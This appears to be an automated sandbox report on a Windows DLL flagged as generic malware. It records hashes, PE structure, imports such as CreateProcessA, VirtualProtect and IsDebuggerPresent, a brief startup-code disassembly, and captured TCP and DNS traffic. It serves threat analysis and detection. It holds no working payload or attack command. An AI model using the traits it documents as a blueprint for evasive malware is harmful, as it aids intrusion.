Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.KTQ...yj..tTZ..VA.r.BA.rYA.FY...V..""(.Jh.E -,..j......?.z..{:...8.....{s....q.A. HS....x>......Rp.<.B.&....b...TT....@..x....8.t..c.q.q.].d.'v.G...8.c.[..ex.vg......x}..A7G...R.H..T...g.~..............0....H~,.2y...)...G..0tk..{.."f~h.G..#?2......}]4/..54...]6A. Iik...x-T.;u..5h._+.j.....{.e.,........#....;...Q>w...!.....A..t<../>...s.....ha...g.\|Y...9[.....:..........1....c.:.7l....\|._.o..H.Woh."dW..).D.&O1.XZ"I......y.5..>..j..7..z..3....M\|..W...2....q.8.3.......~}89........G.+.......IEND.B`.

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.651733913217986
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 98.32% Windows Screen Saver (13104/52) 1.29% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
File size:	400896
MD5:	81f401defa8faa2e4745590bc4f6c008
SHA1:	bddb75a5aa6ed1272307ee096b59e2e61076a6f9
SHA256:	74cc533238ae33245519b52784db0e6adbd3380b350717fdc69d4e36714173d5
SHA512:	52b3ee08b33915c910733f05087ccbaf01f02693eeb91baa0c6c7a7350dc38709556142dde4db650614d6401244171fc3b2279516cd0851498752e6cafe104fc
SSDEEP:	6144:pwM/k5f0utJIrBpYffzQoKSpMDpc0MxBdH6ZWcNu0ewv6ZiEl6MAm:SM/K0carBOPMDu0N1EwS4Es
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\..J=g.J=g.J=g.To..L=g..r..K=g.To..E=g.To..D=g.To..M=g.m...M=g.J=f..=g.To...=g.To..K=g.To..K=g.To..K=g.RichJ=g.........PE..L..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1000c252
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x4B5847E3 [Thu Jan 21 12:26:11 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	cbbc33a550d4a8746cac0220ca7c1b3c

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F97E0BAA8E7h
call 00007F97E0BB2BCDh
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007F97E0BAA7D1h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [1005E4D0h+ecx*8]
je 00007F97E0BAA8F5h
inc ecx
cmp ecx, 2Dh
jc 00007F97E0BAA8D3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F97E0BAA8F0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [1005E4D4h+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F97E0BB0D43h
test eax, eax
jne 00007F97E0BAA8E8h
mov eax, 1005E638h
ret
add eax, 08h
ret
call 00007F97E0BB0D30h
test eax, eax
jne 00007F97E0BAA8E8h
mov eax, 1005E63Ch
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F97E0BAA8C7h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F97E0BAA867h
pop ecx
mov esi, eax
call 00007F97E0BAA8A1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 4Ch
mov eax, dword ptr [1005E640h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[IMP] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5dbf0	0x79	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5d324	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6e000	0x810	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6f000	0x1d74	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x401f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5b210	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x40000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3ea10	0x3ec00	False	0.680193289343	data	6.87784518477	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x40000	0x1dc69	0x1de00	False	0.628489474372	data	5.60800335505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5e000	0xf1a8	0x1a00	False	0.327524038462	data	4.07640958192	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x6e000	0x810	0xa00	False	0.384375	data	3.35688636481	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6f000	0x2b5c	0x2c00	False	0.547141335227	data	5.26856093985	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_STRING	0x6e560	0x12e	data	English	United States
RT_STRING	0x6e690	0x180	data	English	United States
RT_VERSION	0x6e120	0x2c0	data	English	United States
RT_MANIFEST	0x6e3e0	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

CreateProcessA, MultiByteToWideChar, GetStartupInfoA, CopyFileA, SetFileAttributesA, LoadLibraryA, Sleep, VirtualProtect, GetCurrentDirectoryA, GetFileTime, CloseHandle, DeleteFileA, GetTickCount, WaitForSingleObject, GetModuleFileNameA, ExitProcess, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetTimeFormatA, GetDateFormatA, GetCurrentThreadId, GetCommandLineA, GetCPInfo, RaiseException, RtlUnwind, LCMapStringW, LCMapStringA, GetStringTypeW, HeapAlloc, HeapCreate, HeapDestroy, VirtualFree, VirtualAlloc, HeapReAlloc, GetModuleHandleW, GetProcAddress, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP, IsValidCodePage, GetTimeZoneInformation, SetHandleCount, GetStdHandle, GetFileType, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, ReadFile, SetFilePointer, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, GetLocaleInfoW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, GetModuleHandleA

GPEDIT.DLL

BrowseForGPO, CreateGPOLink, ImportRSoPData

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x1003a2d0
Saverose	2	0x1003b9c0
Thingchord	3	0x1003bb20

Version Infos

Description	Data
LegalCopyright	Men period 2012 High property
InternalName	HowDry
FileVersion	3.3.2.848
CompanyName	Machine sand
Rub pass	Both get
ProductName	Exercise.dll
ProductVersion	3.3.2.848
FileDescription	Men period
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2021 10:22:30.125745058 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.125775099 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.125785112 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.126854897 CET	49762	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.127774954 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.128660917 CET	49764	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.168467999 CET	443	49760	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.168651104 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.168653965 CET	443	49759	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.168667078 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.168713093 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.169179916 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.169323921 CET	443	49762	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.169414997 CET	49762	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.170245886 CET	443	49763	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.170331001 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.171245098 CET	443	49764	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.171324015 CET	49764	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.171380997 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.173252106 CET	49762	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.175750971 CET	49764	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.176310062 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.176851988 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.178183079 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.213952065 CET	443	49763	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.214850903 CET	443	49763	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.214869022 CET	443	49763	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.214927912 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.214939117 CET	443	49763	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.214951992 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.214982986 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.215734005 CET	443	49762	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.218036890 CET	443	49762	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.218056917 CET	443	49762	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.218070030 CET	443	49762	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.218136072 CET	49762	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.218194962 CET	49762	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.218524933 CET	443	49764	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.218808889 CET	443	49760	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.219341040 CET	443	49764	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.219383955 CET	443	49764	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.219410896 CET	49764	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.219417095 CET	443	49764	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.219434023 CET	49764	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.219454050 CET	443	49759	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.219459057 CET	49764	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.219835043 CET	443	49760	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.219877005 CET	443	49760	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.219907999 CET	443	49760	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.219911098 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.219933987 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.219955921 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.220344067 CET	443	49759	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.220386982 CET	443	49759	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.220407009 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.220422029 CET	443	49759	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.220436096 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.220478058 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.220642090 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.227056980 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.227102995 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.227138996 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.227164984 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.227188110 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.238770008 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.247037888 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.267890930 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.267904043 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.268800974 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.268816948 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.268821001 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269056082 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269066095 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269068956 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269148111 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269349098 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269356012 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269357920 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269526005 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269685030 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.269879103 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.270121098 CET	49762	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.270661116 CET	49762	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.275578022 CET	49764	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.276139021 CET	49764	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.281562090 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.281841040 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.289940119 CET	443	49759	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.290041924 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.310683966 CET	443	49763	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.310699940 CET	443	49760	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.310756922 CET	49763	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.310801983 CET	49760	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.311271906 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.311501980 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.311543941 CET	443	49761	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.311557055 CET	49761	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.311626911 CET	443	49759	151.101.1.44	192.168.2.4
Jan 22, 2021 10:22:30.311685085 CET	49759	443	192.168.2.4	151.101.1.44
Jan 22, 2021 10:22:30.311722994 CET	443	49761	151.101.1.44	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2021 10:22:14.953986883 CET	62389	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:15.004823923 CET	53	62389	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:16.152322054 CET	49910	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:16.200123072 CET	53	49910	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:17.053478003 CET	55854	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:17.101533890 CET	53	55854	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:18.475025892 CET	64549	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:18.523046970 CET	53	64549	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:19.695913076 CET	63153	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:19.752144098 CET	53	63153	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:21.774990082 CET	52991	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:21.832423925 CET	53	52991	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:21.977278948 CET	53700	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:22.025253057 CET	53	53700	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:22.936449051 CET	51726	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:22.998114109 CET	53	51726	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:23.144337893 CET	56794	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:23.192470074 CET	53	56794	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:23.308284044 CET	56534	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:23.359330893 CET	53	56534	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:23.851175070 CET	56627	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:23.903099060 CET	56621	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:23.905189037 CET	53	56627	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:23.965473890 CET	53	56621	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:25.736314058 CET	63116	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:25.808186054 CET	53	63116	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:26.317377090 CET	64078	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:26.385763884 CET	53	64078	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:27.457756042 CET	64801	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:27.522135019 CET	53	64801	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:28.109246969 CET	61721	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:28.173569918 CET	53	61721	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:28.669420004 CET	51255	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:28.729680061 CET	53	51255	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:28.935030937 CET	61522	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:28.985711098 CET	53	61522	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:30.030206919 CET	52337	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:30.087997913 CET	53	52337	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:31.858191013 CET	55046	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:31.906213045 CET	53	55046	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:44.457304955 CET	49612	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:44.505333900 CET	53	49612	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:45.010353088 CET	49285	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:45.058202028 CET	53	49285	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:45.533080101 CET	50601	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:45.583926916 CET	53	50601	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:46.858156919 CET	60875	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:46.908955097 CET	53	60875	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:48.009017944 CET	56448	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:48.056947947 CET	53	56448	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:48.826272011 CET	59172	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:48.877064943 CET	53	59172	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:49.702872992 CET	62420	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:49.752746105 CET	53	62420	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:51.737354994 CET	60579	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:51.785300016 CET	53	60579	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:52.660470963 CET	50183	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:52.708281994 CET	53	50183	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:52.751801968 CET	60579	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:52.808357000 CET	53	60579	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:53.676310062 CET	50183	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:53.732480049 CET	53	50183	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:53.813358068 CET	60579	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:53.872875929 CET	53	60579	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:54.751154900 CET	50183	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:54.800225973 CET	53	50183	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:55.822925091 CET	60579	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:55.879236937 CET	53	60579	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:56.758759975 CET	50183	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:56.815004110 CET	53	50183	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:59.520256042 CET	61531	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:59.580581903 CET	53	61531	8.8.8.8	192.168.2.4
Jan 22, 2021 10:22:59.836859941 CET	60579	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:22:59.884768009 CET	53	60579	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:00.769476891 CET	50183	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:00.817528963 CET	53	50183	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:05.021661997 CET	49228	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:05.081130981 CET	53	49228	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:14.209455967 CET	59794	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:14.276134014 CET	53	59794	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:14.868804932 CET	55916	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:14.929044008 CET	53	55916	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:15.498727083 CET	52752	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:15.558080912 CET	53	52752	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:15.994611025 CET	60542	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:16.056185961 CET	53	60542	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:16.249583960 CET	60689	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:16.315665007 CET	53	60689	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:16.667967081 CET	64206	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:16.724391937 CET	53	64206	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:17.431432009 CET	50904	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:17.487570047 CET	53	50904	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:18.827280045 CET	57525	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:18.883861065 CET	53	57525	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:19.735281944 CET	53814	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:19.794025898 CET	53	53814	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:21.282136917 CET	53418	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:22.302459955 CET	53418	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:23.091906071 CET	62833	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:23.291399002 CET	53	53418	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:23.714015961 CET	59260	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:23.773457050 CET	53	59260	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:24.133869886 CET	62833	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:24.192240000 CET	53	62833	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:53.614837885 CET	49944	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:53.940606117 CET	53	49944	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:54.442811966 CET	63300	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:54.490890980 CET	53	63300	8.8.8.8	192.168.2.4
Jan 22, 2021 10:23:58.301455021 CET	61449	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:23:58.372677088 CET	53	61449	8.8.8.8	192.168.2.4
Jan 22, 2021 10:24:00.498025894 CET	51275	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:24:00.554508924 CET	53	51275	8.8.8.8	192.168.2.4
Jan 22, 2021 10:24:07.806113958 CET	63492	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:24:08.141377926 CET	53	63492	8.8.8.8	192.168.2.4
Jan 22, 2021 10:25:02.319375992 CET	58945	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:25:02.376198053 CET	53	58945	8.8.8.8	192.168.2.4
Jan 22, 2021 10:25:07.208496094 CET	60779	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:25:07.256606102 CET	53	60779	8.8.8.8	192.168.2.4
Jan 22, 2021 10:25:07.763724089 CET	64014	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:25:07.766397953 CET	57091	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:25:07.814851046 CET	53	64014	8.8.8.8	192.168.2.4
Jan 22, 2021 10:25:08.180428982 CET	53	57091	8.8.8.8	192.168.2.4
Jan 22, 2021 10:25:08.989173889 CET	55904	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:25:09.048562050 CET	53	55904	8.8.8.8	192.168.2.4
Jan 22, 2021 10:25:20.199268103 CET	52109	53	192.168.2.4	8.8.8.8
Jan 22, 2021 10:25:20.255620956 CET	53	52109	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 22, 2021 10:22:23.308284044 CET	192.168.2.4	8.8.8.8	0x9158	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
